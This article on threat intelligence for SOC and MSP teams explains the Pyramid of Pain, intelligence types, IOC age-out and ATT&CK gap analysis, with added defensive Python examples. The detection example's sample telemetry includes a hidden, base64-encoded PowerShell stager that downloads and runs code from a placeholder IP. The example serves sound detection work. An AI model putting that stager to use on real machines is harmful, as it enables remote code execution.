| Figure | What it measures |
|---|---|
| 72% | Organisations that use or plan to integrate AI into CTI programmes in 2025 (SANS CTI Survey) |
| 84% | Threat hunting is the #1 CTI use case in mature SOC teams — up from 71% in 2024 (SANS 2025) |
| 3–6 months | Typical ROI timeline for organisations that operationalise CTI into their SIEM/SOC |
| Hours | How long IP/domain IOCs stay reliable — the decay problem CTI teams fight every day |
It’s 2:15am. Your SOC fires on a client — unusual DNS traffic, outbound connections to IPs you’ve never seen, a spike in events that doesn’t match anything in the baseline. The analyst opens the ticket and faces a question that defines the next thirty minutes: real incident, or Tuesday-night noise?
Now picture the same alert where threat intelligence is actually embedded in operations. The SIEM enrichment fires automatically: destination IP confirmed as active C2 infrastructure for a ransomware group targeting mid-market companies in the client’s exact industry, domain registered six days ago, DNS pattern matching known beaconing behaviour. The analyst knows within ninety seconds what they’re dealing with — and what to do next.
That’s the practical difference CTI makes. This article covers what threat intelligence actually is, why the Pyramid of Pain matters, the four intelligence types and who uses each, and — most importantly — what SOC teams do with it every single day.
Threat intelligence is processed, contextualised information about adversaries — their capabilities, intentions, infrastructure, and behaviours — that can be acted upon to improve defensive decisions. The key words are ‘processed’ and ‘acted upon.’
Raw data — a list of IPs, a dump of domain names, a file hash — is not intelligence. It becomes intelligence when it’s been analysed, contextualised, and connected to a decision: block this IP, hunt for this behaviour, patch this vulnerability before this group weaponises it.
The Three-Part Intelligence Test. Before calling something threat intelligence, ask three questions. (1) Is it timely? Intelligence that arrives after the attack it describes is history. (2) Is it relevant? Generic global threat data is noise for a specific client — intelligence speaks to the specific adversaries and sectors that affect your environment. (3) Is it actionable? If you can’t take a concrete security decision from it, it’s a threat report, not intelligence.
Most feeds fail on relevance or actionability. That’s why a large volume of technically correct threat data can actually increase analyst cognitive load without improving detection outcomes. The most common trap: an IOC ingestion programme masquerading as a CTI programme. Subscribe to feeds, ingest millions of IPs and domains, call it done. A year later you have enormous alert volume, analysts who’ve stopped investigating feed-sourced alerts, and a SIEM spending 40% of its processing budget on blocklist lookups. IOC ingestion has a place — but it’s the lowest-value layer. The high-value work is TTP intelligence, which brings us to the Pyramid.
Described by security researcher David Bianco in 2013, the Pyramid of Pain organises indicators by the cost they impose on adversaries when defenders act on them. The higher you operate, the more it hurts the attacker — and the more durable your detections become.
| Level | Indicator Type | Attacker Cost | Practical Value to Defenders |
|---|---|---|---|
| TTP | Tactics, Techniques & Procedures | Very High | Highest value — detections survive infrastructure rotation and tool changes. ATT&CK-mapped rules live here. |
| Tools | Malware, RATs, exploit kits | High | YARA/Sigma signatures catch known malware families. Forces attacker to rebuild tooling. |
| Host / Network Artefacts | Registry keys, mutexes, URI patterns | Moderate | More durable than IP/domain IOCs. Specific artefacts can persist across campaigns. |
| Domain Names | C2 and phishing domains | Low | Useful for immediate blocking but decays fast. Feeds must be fresh to mean anything. |
| IP Addresses | IPs used in attacks | Very Low | Short-term blocking only. Yesterday’s IPs may already serve legitimate traffic today. |
| File Hashes | MD5, SHA-256 of malicious files | Trivial | One recompile = new hash. Works only on exact known samples. |
The takeaway is simple: most CTI programmes spend 80% of their investment on the bottom two tiers — hash-based AV signatures and IP blocklists — while the adversaries they’re most worried about are operating on TTPs those controls never touch. Build detections on behaviours, not bytes. A rule that fires on ‘PowerShell spawned from an Office process, executing a base64-encoded command, making an outbound connection within 30 seconds’ catches the new variant, the old variant, and the next one — because the behaviour hasn’t changed, only the bytes.
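To make the behavioural rule above concrete, here is an added example (not code from the article) that expresses it as correlation logic in Python over constructed telemetry: an Office parent spawning PowerShell with an encoded command, followed by an outbound connection from the same process within 30 seconds. The event schema, hostnames, PIDs and the 198.51.100.7 address are constructed for the example; nothing in the rule keys on a hash, IP or domain, which is the point the paragraph makes.

```python
import base64
import re
from datetime import datetime, timedelta

# Behavioural rule from the article: Office process -> PowerShell with an
# encoded command -> outbound connection within 30 seconds. No hash, IP or
# domain is involved, so a recompiled payload or rotated C2 still matches.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
WINDOW = timedelta(seconds=30)
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Decoded -EncodedCommand payload (UTF-16LE), or None if absent or undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect(events):
    """Correlate process-creation and network events (constructed schema) into alerts."""
    events = sorted(events, key=lambda e: e["ts"])
    alerts = []
    for proc in events:
        if proc["type"] != "process":
            continue
        if basename(proc["parent_image"]) not in OFFICE_PARENTS:
            continue
        if basename(proc["image"]) not in POWERSHELL:
            continue
        decoded = decode_encoded_command(proc["cmdline"])
        if decoded is None:
            continue
        # Third stage: a connection from the same host/pid inside the window.
        for net in events:
            if (net["type"] == "network" and net["host"] == proc["host"]
                    and net["pid"] == proc["pid"]
                    and proc["ts"] <= net["ts"] <= proc["ts"] + WINDOW):
                alerts.append({
                    "host": proc["host"],
                    "pid": proc["pid"],
                    "parent": basename(proc["parent_image"]),
                    "destination": f'{net["dst_ip"]}:{net["dst_port"]}',
                    "seconds_to_connect": int((net["ts"] - proc["ts"]).total_seconds()),
                    "decoded_command": decoded,
                })
                break
    return alerts


# Constructed sample telemetry (not from the article). 198.51.100.0/24 is a
# documentation range; the payload string is encoded the way PowerShell expects.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
T0 = datetime(2025, 3, 4, 2, 15, 0)
SAMPLE_EVENTS = [
    # A: Word -> encoded PowerShell -> connection 12s later: should alert.
    {"ts": T0, "type": "process", "host": "ws-0412", "pid": 5120, "image": PS_IMAGE,
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"ts": T0 + timedelta(seconds=12), "type": "network", "host": "ws-0412", "pid": 5120,
     "dst_ip": "198.51.100.7", "dst_port": 443},
    # B: same command line launched from Explorer (an admin script): wrong parent, no alert.
    {"ts": T0 + timedelta(minutes=5), "type": "process", "host": "ws-0412", "pid": 6001,
     "image": PS_IMAGE, "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": f"powershell.exe -enc {ENCODED}"},
    {"ts": T0 + timedelta(minutes=5, seconds=3), "type": "network", "host": "ws-0412",
     "pid": 6001, "dst_ip": "198.51.100.7", "dst_port": 443},
    # C: Excel -> encoded PowerShell, but the connection comes 90s later: outside the window.
    {"ts": T0 + timedelta(minutes=10), "type": "process", "host": "ws-0099", "pid": 7777,
     "image": PS_IMAGE, "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": f"powershell.exe -enc {ENCODED}"},
    {"ts": T0 + timedelta(minutes=11, seconds=30), "type": "network", "host": "ws-0099",
     "pid": 7777, "dst_ip": "198.51.100.7", "dst_port": 443},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Only scenario A fires. Scenario B has the right command line but the wrong parent, and scenario C has the right chain but misses the 30-second window, which is the kind of tuning decision a detection engineer makes explicitly rather than inheriting from a feed. The decoded command is attached to the alert so the analyst sees the stager without re-running the decode by hand.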
A mature CTI programme operates at four levels simultaneously. Getting this wrong is surprisingly common — strategic reports sent to analysts (too abstract to act on), raw IOC feeds forwarded to executives (incomprehensible and alarming).
| Type | Audience | Timescale | What It Looks Like |
|---|---|---|---|
| Strategic | CISO, Board | Weeks–months | ‘Ransomware groups targeting healthcare increased 40% in Q3. Groups X and Y specifically targeting EHR vendors. Recommended investments: endpoint isolation, backup hardening.’ |
| Operational | SOC Manager, Detection Engineers | Days–weeks | ‘A phishing campaign impersonating Microsoft is targeting finance departments in mid-market UK businesses. Emails drop a Cobalt Strike beacon. Indicators and detection guidance attached.’ |
| Tactical | SOC Analysts, Threat Hunters | Hours–days | IOC packages, Sigma rules, YARA signatures — specific IPs, domains, hashes, and ready-to-deploy detection rules for a specific malware family or campaign. |
| Technical | Security Engineers, Platform Teams | Real-time–hours | Raw STIX/TAXII feeds, TIP data, automated IOC ingestion into SIEM/SOAR — machine-readable indicators consumed directly by security tools without analyst involvement. |
For MSP SOC teams, Tactical and Technical intelligence drive the day-to-day. Operational intelligence drives the detection engineering backlog and hunting calendar. Strategic intelligence is what turns your client QBR from a dashboard of alert counts into a meaningful conversation about the threat landscape affecting their industry. The intelligence gives the story — without it, the metrics are just numbers.
Here’s what CTI integration looks like as day-to-day SOC work across the six functions where intelligence drives the most value:
The rule that ties all six workflows together: every threat report that reaches your SOC team should produce at least one tangible output — a new detection rule, an updated playbook section, a retrospective hunt, or a client advisory. One report, one action. The teams that maintain this discipline consistently outperform the ones who treat threat reports as reading material.
Most MSPs don’t have a dedicated threat intelligence analyst — and that’s fine. CTI functions get distributed across the SOC team alongside alert triage, detection engineering, and IR. Here’s how to build real capability within those constraints.
Start with one high-quality commercial feed and one OSINT source — CISA KEV plus vendor advisories is a strong baseline. Get the ingestion pipeline right, establish IOC age-out policies (IPs: 7–14 days; domains: 7–30 days; TTPs: never expire), and validate alert quality before adding more feeds. The MSPs that fail at CTI adoption subscribe to 15 feeds and process none of them effectively.
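The age-out policy in the paragraph above, as an added example in Python (not code from the article). It takes the upper bound of each range (14 days for IPs, 30 for domains, never for TTPs) as an assumed default, measures age from the last sighting rather than the first so that an indicator that keeps matching stays alive, and refuses to guess a policy for an IOC type the policy does not name. The indicator values and sources are constructed; 203.0.113.0/24 and .example are reserved for documentation.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta

# Age-out policy from the article: IPs 7-14 days, domains 7-30 days, TTPs never.
# Taking the top of each range is an assumed tuning choice; None means never expires.
DEFAULT_TTL = {"ip": timedelta(days=14), "domain": timedelta(days=30), "ttp": None}


@dataclass
class IOC:
    value: str
    ioc_type: str        # "ip", "domain" or "ttp"
    source: str
    first_seen: datetime
    last_seen: datetime


def is_expired(ioc, now, ttl=DEFAULT_TTL):
    """Age is measured from last_seen, so a re-sighting keeps an indicator alive."""
    if ioc.ioc_type not in ttl:
        raise ValueError(f"no age-out policy for IOC type {ioc.ioc_type!r}")
    max_age = ttl[ioc.ioc_type]
    return max_age is not None and now - ioc.last_seen > max_age


def record_sighting(ioc, seen_at):
    """A fresh match (e.g. the IOC hit in today's logs) resets the clock."""
    if seen_at > ioc.last_seen:
        ioc.last_seen = seen_at
    return ioc


def age_out(iocs, now, ttl=DEFAULT_TTL):
    """Split the active set into (keep, expire) under the policy."""
    keep, expire = [], []
    for ioc in iocs:
        (expire if is_expired(ioc, now, ttl) else keep).append(ioc)
    return keep, expire


# Constructed sample indicators (not from the article).
NOW = datetime(2025, 3, 4, 9, 0)


def days_ago(n):
    return NOW - timedelta(days=n)


SAMPLE_IOCS = [
    IOC("203.0.113.45", "ip", "vendor-feed", days_ago(40), days_ago(20)),           # 20d > 14d: expire
    IOC("203.0.113.200", "ip", "vendor-feed", days_ago(5), days_ago(3)),            # fresh: keep
    IOC("login-msft-verify.example", "domain", "osint", days_ago(25), days_ago(20)),  # 20d <= 30d: keep
    IOC("invoice-secure.example", "domain", "osint", days_ago(60), days_ago(45)),   # 45d > 30d: expire
    IOC("Office spawns encoded PowerShell", "ttp", "ir-2023-07", days_ago(600), days_ago(600)),  # never expires
]

if __name__ == "__main__":
    keep, expire = age_out(SAMPLE_IOCS, NOW)
    print("keep:", [i.value for i in keep])
    print("expire:", [i.value for i in expire])
```

The two decisions worth carrying into a real TIP are that the clock runs from `last_seen`, not `first_seen`, and that an unknown IOC type is an error rather than a silent default. Both failure modes otherwise show up as either a blocklist that never shrinks or one that quietly drops indicators nobody reviewed.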
Use ATT&CK as the connective tissue. Map every significant threat report to ATT&CK techniques. Map your existing SIEM rules to ATT&CK techniques. The gap between those two maps is your detection backlog — a direct, concrete comparison between what attackers do and what you can currently detect. That’s how you prioritise detection engineering work without abstract risk scores.
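The gap analysis described above, as an added example in Python (not code from the article): threat reports mapped to ATT&CK technique IDs on one side, SIEM rules mapped to technique IDs on the other, and the backlog is the set difference ranked by how many reports cite each uncovered technique. The technique IDs are real ATT&CK identifiers; the report names, rule names and the mappings between them are constructed sample data. One design choice is added beyond the paragraph: a report citing a parent technique counts as covered when a rule maps to one of its sub-techniques.

```python
from collections import defaultdict


def covered_techniques(rules):
    """Union of ATT&CK technique IDs that existing rules are mapped to."""
    return {t for techs in rules.values() for t in techs}


def is_covered(technique, covered):
    if technique in covered:
        return True
    # Design choice (assumed): a parent technique cited in a report counts as
    # covered when at least one rule maps to one of its sub-techniques.
    if "." not in technique:
        return any(t.startswith(technique + ".") for t in covered)
    return False


def detection_gap(reports, rules):
    """Uncovered techniques as (technique, report_count, report_names), most-cited first."""
    covered = covered_techniques(rules)
    cited_by = defaultdict(list)
    for name, techs in reports.items():
        for t in techs:
            cited_by[t].append(name)
    gap = [(t, len(names), sorted(names))
           for t, names in cited_by.items() if not is_covered(t, covered)]
    gap.sort(key=lambda g: (-g[1], g[0]))
    return gap


def coverage_ratio(reports, rules):
    """Fraction of report-cited techniques that at least one rule covers."""
    covered = covered_techniques(rules)
    cited = {t for techs in reports.values() for t in techs}
    if not cited:
        return 1.0
    return sum(is_covered(t, covered) for t in cited) / len(cited)


# Constructed sample data (not from the article). IDs are real ATT&CK techniques;
# which report cites which, and what the rules cover, is made up for illustration.
SAMPLE_REPORTS = {
    "Report A (ransomware affiliate, healthcare)": {"T1566.001", "T1059.001", "T1071.001", "T1486", "T1021.001"},
    "Report B (phishing campaign, Cobalt Strike)": {"T1566.001", "T1059.001", "T1071.001", "T1003.001"},
    "Report C (credential stuffing, financial)": {"T1110", "T1078"},
}
SAMPLE_RULES = {
    "Office spawns encoded PowerShell": {"T1059.001"},
    "Macro-laden attachment delivered by mail": {"T1566.001"},
    "Login failures spread across many accounts": {"T1110.004"},
}

if __name__ == "__main__":
    print(f"coverage: {coverage_ratio(SAMPLE_REPORTS, SAMPLE_RULES):.0%}")
    for technique, count, names in detection_gap(SAMPLE_REPORTS, SAMPLE_RULES):
        print(f"{technique:<10} cited by {count}: {', '.join(names)}")
```

With the sample data the top of the backlog is T1071.001, cited by two of three reports and covered by no rule, which is exactly the ordering the paragraph asks for: work ranked by what the adversaries you are reading about actually do, not by an abstract score. Report C's parent-level T1110 is treated as covered by the T1110.004 rule, so it drops out of the gap.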
And don’t overlook your own incident data. When your SOC responds to a credential-stuffing campaign hitting one financial sector client, those source IPs, targeted usernames, timing patterns, and techniques are immediately relevant to every other financial sector client in your portfolio. The same campaign that hit one client this week will hit another next week. Formalise that feedback loop.
Threat intelligence done well is one of the highest-leverage investments a SOC can make — because it converts reactive alert investigation into proactive, threat-informed defence. Faster detection, more accurate triage, purposeful hunting, more efficient incident response.
The measure of a good CTI programme isn’t the size of the feed library. It’s the quality of the detections it produced and the incidents it prevented. And for MSPs, it’s also a client communication asset — the difference between a security service that feels like insurance and one that feels like a genuine strategic partner.
